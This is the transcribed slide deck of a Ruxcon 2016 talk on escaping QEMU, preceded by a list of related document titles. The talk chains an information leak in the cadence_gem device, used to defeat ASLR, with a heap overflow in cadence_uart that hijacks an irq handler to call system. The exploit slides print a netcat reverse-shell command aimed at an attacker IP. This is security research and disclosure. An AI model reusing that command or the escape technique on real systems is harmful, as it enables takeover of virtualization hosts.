Qiang Li && Zhibin Hu/Qihoo 360 Gear Team Ruxcon 2016

Similar documents
Malware

Hypervisor security. Evgeny Yakovlev, DEFCON NN, 2017

Virtunoid: Breaking out of KVM

MWR InfoSecurity Security Advisory. Linux USB Device Driver - Buffer Overflow. 29 th October Contents

String Oriented Programming Exploring Format String Attacks. Mathias Payer

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)

Knut Omang Ifi/Oracle 20 Oct, Introduction to virtualization (Virtual machines) Aspects of network virtualization:

Secure Containers with EPT Isolation

SA30228 / CVE

Back To The Future: A Radical Insecure Design of KVM on ARM

VGA Assignment Using VFIO. Alex Williamson October 21 st, 2013

CS 161 Computer Security

Leveraging CVE for ASLR Bypass & RCE. Gal De Leon & Nadav Markus

Return-orientated Programming

CSE 509: Computer Security

Tolerating Malicious Drivers in Linux. Silas Boyd-Wickizer and Nickolai Zeldovich

Exploit Mitigation - PIE

CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR

Live Migration with Mdev Device

Virtual Machines. Part 2: starting 19 years ago. Operating Systems In Depth IX 1 Copyright 2018 Thomas W. Doeppner. All rights reserved.

Virtualization Device Emulator Testing Technology. Speaker: Qinghao Tang Title 360 Marvel Team Leader

Smashing the Buffer. Miroslav Štampar

What is KVM? KVM patch. Modern hypervisors must do many things that are already done by OSs Scheduler, Memory management, I/O stacks

The Challenges of X86 Hardware Virtualization. GCC- Virtualization: Rajeev Wankar 36

Is Exploitation Over? Bypassing Memory Protections in Windows 7

64-bit ARM Unikernels on ukvm

Reversed Buffer Overflow Cross Stack Attacks. Kris Kaspersky Endeavor Security, Inc.

Qemu code fault automatic discovery with symbolic search. Paul Marinescu, Cristian Cadar, Chunjie Zhu, Philippe Gabriel

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks

INFLUENTIAL OPERATING SYSTEM RESEARCH: SECURITY MECHANISMS AND HOW TO USE THEM CARSTEN WEINHOLD

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

Virtualisation: The KVM Way. Amit Shah

Lecture 7. Xen and the Art of Virtualization. Paul Braham, Boris Dragovic, Keir Fraser et al. 16 November, Advanced Operating Systems

Exploits and gdb. Tutorial 5

A Userspace Packet Switch for Virtual Machines

CS 161 Computer Security

Cross-architecture Virtualisation

Hello? It s Me, Your Not So Smart Device. We Need to Talk.

Changelog. Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part

Chapter 5 C. Virtual machines

Operating System Security

I/O virtualization. Jiang, Yunhong Yang, Xiaowei Software and Service Group 2009 虚拟化技术全国高校师资研讨班

Documentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit

Pangu 9 Internals. Tielei Wang and Hao Xu

Buffer Overflow. Jo, Heeseung

BUFFER OVERFLOW. Jo, Heeseung

CMPSC 497 Buffer Overflow Vulnerabilities

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Other array problems. Integer overflow. Outline. Integer overflow example. Signed and unsigned

Play with FILE Structure Yet Another Binary Exploitation Technique. Abstract

Applications. Cloud. See voting example (DC Internet voting pilot) Select * from userinfo WHERE id = %%% (variable)

ENEE 457: Computer Systems Security. Lecture 16 Buffer Overflow Attacks

THE GREAT ESCAPES OF VMWARE: A RETROSPECTIVE CASE STUDY OF VMWARE GUEST-TO-HOST ESCAPE VULNERABILITIES

Kernel Self Protection

Security and Privacy in Computer Systems. Lecture 5: Application Program Security

Virtualization, Xen and Denali

Digital Forensics Lecture 02 PDF Structure

CSE 127: Computer Security. Memory Integrity. Kirill Levchenko

Exploiting USB/IP in Linux

Lecture 5: February 3

Software Security: Buffer Overflow Attacks

The Geometry of Innocent Flesh on the Bone

Module: Program Vulnerabilities. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

Lecture 10 Code Reuse

Defeat Exploit Mitigation Heap Attacks. compass-security.com 1

KVM Weather Report. Amit Shah SCALE 14x

KSMA: Breaking Android kernel isolation and Rooting with ARM MMU features. WANG, YONG a.k.a. Pandora Lab of Ali Security

Monitoring Hypervisor Integrity at Runtime. Student: Cuong Pham PIs: Prof. Zbigniew Kalbarczyk, Prof. Ravi K. Iyer ACC Meeting, Oct 2015

Bypassing Mitigations by Attacking JIT Server in Microsoft Edge

MASSIVE SCALE USB DEVICE DRIVER FUZZ WITHOUT DEVICE. HC Tencent s XuanwuLab

About unchecked management SMM & UEFI. Vulnerability. Patch. Conclusion. Bruno Pujos. July 16, Bruno Pujos

Linux and Xen. Andrea Sarro. andrea.sarro(at)quadrics.it. Linux Kernel Hacking Free Course IV Edition

Fundamentals of Computer Security

Programmed I/O accesses: a threat to Virtual Machine Monitors?

Improve VNF safety with Vhost-User/DPDK IOMMU support

Intel Graphics Virtualization on KVM. Aug KVM Forum 2011 Rev. 3

Virtualization History and Future Trends

Security Architecture

Hacking from ios 8 to ios 9 TEAM PANGU

Bypassing Browser Memory Protections

Virtualization and Virtual Machines. CS522 Principles of Computer Systems Dr. Edouard Bugnion

Vulnerability Analysis I:

The Kernel Abstraction. Chapter 2 OSPP Part I

Making Nested Virtualization Real by Using Hardware Virtualization Features

Attacking Next- Generation Firewalls

TAKING WINDOWS 10 KERNEL EXPLOITATION TO THE NEXT LEVEL LEVERAING WRITE- WHAT-WHERE VULNERABILITIES IN CREATORS UPDATE

Graphics Pass-through with VT-d

Xen is not just paravirtualization

CS 550 Operating Systems Spring Interrupt

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES

Hardware Involved Software Attacks

WINDOWS 10 RS2/RS3 GDI DATA-ONLY EXPLOITATION TALES

CSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko

Identifying and Analyzing Pointer Misuses for Sophisticated Memory-corruption Exploit Diagnosis

Spectre and Meltdown. Clifford Wolf q/talk

Hacking Blind BROP. Presented by: Brooke Stinnett. Article written by: Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazie`res, Dan Boneh

Lecture 08 Control-flow Hijacking Defenses

PROTECTING VM REGISTER STATE WITH AMD SEV-ES DAVID KAPLAN LSS 2017

Lecture 4 September Required reading materials for this class

Fakultät Informatik Institut für Systemarchitektur, Betriebssysteme THE NOVA KERNEL API. Julian Stecklina

Transcription:

Qiang Li && Zhibin Hu/Qihoo 360 Gear Team Ruxcon 2016

Who are we Security researcher in Qihoo 360 Inc(Gear Team) Vulnerability discovery and analysis Specialize in QEMU currently 50+ security issues, 33 CVE now 2

Agenda QEMU overview QEMU Device Model The bug and exploit Demo 3

QEMU Overview 4

QEMU overview Full system/user mode emulation Software emulation Accelerator such as KVM/XEN 5

QEMU overview The revival of virtualization Hardware support: Intel VT && AMD SVM QEMU for device emulation KVM && Xen 6

QEMU overview QEMU is a user process QEMU s virtual address space as Guest RAM QEMU s thread as Guest vcpu 7

QEMU overview QEMU Guest Host kernel 8

QEMU Device Model 9

QEMU Device Model Most of the devices are software emulation based Guest is unaware of the underlying virtualization environment Many devices should be emulated, such as disk, network card, etc 10

QEMU Device Model PCI devices exposes BAR(Base Address Register) to OS, QEMU provides this layer in device emulation The guest OS interacts with the device by reading and writing to the BARs registered by the device. BAR R/W operations trap to the KVM and control is passed to QEMU 11

QEMU Device Model Previously there has not been much consideration of vulnerabilities present in KVM Data flow: Guest->QEMU Guest data is untrusted and can be malicious 12

QEMU Device Model Two types of BARs: IO port && MMIO Malicious kernel module acts as a driver Read/write IO port/mmio to trigger flaws 13

QEMU Device Model QEMU alloc the BARs and register read/write callback for emulation device 14

QEMU Device Model Device Model is the most attack surface The data flow is clear Review the code to discovery vulnerability 15

16

Two vulnerabilities: information leak and heap overflow Not in the same device emulation code One is in cadence_gem and the other is in cadence_uart 17

The first vulnerability! 18

CVE-2016-2857(Ling Liu of 360.cn) Actully, this is an information leak issue To bypass the ASLR 19

data points a packet plen is the total length of the packet plen is from guest and used to indicate buffer length unchecked plen can lead out of band read 20

TCP/UDP checksum calculation Add every 2 bytes to sum Get the checksum 21

csuma : one packet checksum csumb : the checksum contains the out-of-band data Deduce the byte C from csuma and csumb? 22

The answer is: Yes Though it is not 100% precise, we have a method tmp = (~csumb & 0xffff) - (~csuma & 0xffff); bytec = tmp > 255? (tmp >> 8) & 0xff:tmp-1; 23

The length is never used 24

The tx_packet[2048] is in stack We can read very wide memory after tx_packet[2048] ASLR is bypassed 25

The second vulnerability! 26

27

QEMU register a BAR of 0x1000, so guest can read/write this Guest write: *(pmmio + offset) = value The problem is here: s->r[offset] = value; overflow! 28

Typical Heap overflow What can we overwrite? How to overwrite EIP? handler is a call back with parameter opaque 29

Construct a new irq Write new irq->handler and irq->opaque Overwrite irq->cadenceuartstate, the world is under our control 30

Put them together! 31

The information leak in cadence_gem device and the heap overflow in cadence_uart device Q1:How can we connect these two? Q2:What EIP and argument should we use? 32

QEMU allocates a struct ***State for every device, this happen very early, and will exist as the process running offset between CadenceGEMState and CadenceUARTState is always the same. This connect these two struct 33

Though we can write a lot of memory space. Most of these memory changed quickly. It s difficult even find 50 stable bytes. ROP seems not viable. ret2libc 34

Calculate ret function and find the gem_transmit address and CadenceGEMState 35

Get one address that call system in qemu process address space Get the CadenceUARTState, we can construct our irq after this struct 36

Construct a irq after CadenceUARTState Overwrite CadenceUARTState->irq with the new one 37

exploit 38

handler address calls system function opaque irq->parrent_obj, this is the address of string passed to system parent_obj the arg of system, in this: nc -c /bin/sh 192.168.80.147 5555 39

Demo 40

Attacker ip:192.168.80.161 nc -l -p 5555 -v Victim ip:192.168.80.157 qemu-system-aarch64...-net nic,model=cadence_gem 41

Demo! 42

Summary Background: QEMU device model Vulnerabilities: Information leak &&Heap overflow Exploit 43

Acknowledgements cyg07 Au2o3t 44

Thank you Qiang Li && Zhibin Hu/Gear Team, Qihoo 360 Inc liq3ea@163.com huzhibin@360.cn 45

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback